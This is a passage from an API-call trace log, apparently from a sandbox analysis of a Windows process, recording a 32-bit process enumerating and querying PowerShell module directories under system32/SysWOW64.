ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ISE", cAlternateFileName="")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Archive", cAlternateFileName="MICROS~1.ARC")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Diagnostics", cAlternateFileName="MICROS~1.DIA")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Host", cAlternateFileName="MICROS~1.HOS")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management", cAlternateFileName="MICROS~1.MAN")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.ODataUtils", cAlternateFileName="MICROS~1.ODA")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Security", cAlternateFileName="MICROS~1.SEC")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility", cAlternateFileName="MICROS~1.UTI")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.WSMan.Management", cAlternateFileName="MICROS~2.MAN")) returned 1 [0114.401] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x497da680, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x497da680, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8100bf6e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8100bf6e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0114.402] FindNextFileW (in: hFindFile=0x68e320, lpFindFileData=0x5a0e82c | out: lpFindFileData=0x5a0e82c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0114.402] FindClose (in: hFindFile=0x68e320 | out: hFindFile=0x68e320) returned 1 [0114.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7e4) returned 1 [0114.402] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0ea44) returned 1 [0114.402] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0114.402] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0114.403] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0114.403] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0114.403] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0114.403] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0114.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0114.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0114.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.403] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0114.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", nBufferLength=0x3e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets", lpFilePart=0x0) returned 0x3d [0114.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.404] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\cimcmdlets"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x37 [0114.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", nBufferLength=0x37, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE", lpFilePart=0x0) returned 0x36 [0114.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.406] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\ise"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0114.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive", lpFilePart=0x0) returned 0x4f [0114.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.407] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0114.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", nBufferLength=0x54, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics", lpFilePart=0x0) returned 0x53 [0114.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.409] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.409] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4d [0114.409] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", nBufferLength=0x4d, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host", lpFilePart=0x0) returned 0x4c [0114.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.410] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0114.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0114.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.410] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0114.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", nBufferLength=0x53, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils", lpFilePart=0x0) returned 0x52 [0114.411] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.411] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496cfce0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496cfce0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496cfce0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0114.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", nBufferLength=0x51, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security", lpFilePart=0x0) returned 0x50 [0114.412] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.412] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Security" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0114.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0114.413] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.413] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496f5e40, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x496f5e40, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x496f5e40, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.413] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4e [0114.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", nBufferLength=0x4e, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management", lpFilePart=0x0) returned 0x4d [0114.414] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0e7c4) returned 1 [0114.414] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management"), fInfoLevelId=0x0, lpFileInformation=0x5a0ea88 | out: lpFileInformation=0x5a0ea88*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498007e0, ftCreationTime.dwHighDateTime=0x1d73a90, ftLastAccessTime.dwLowDateTime=0x498007e0, ftLastAccessTime.dwHighDateTime=0x1d73a90, ftLastWriteTime.dwLowDateTime=0x498007e0, ftLastWriteTime.dwHighDateTime=0x1d73a90, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0114.414] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0e7c0) returned 1 [0114.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4f [0114.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", nBufferLength=0x4f, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration", lpFilePart=0x0) 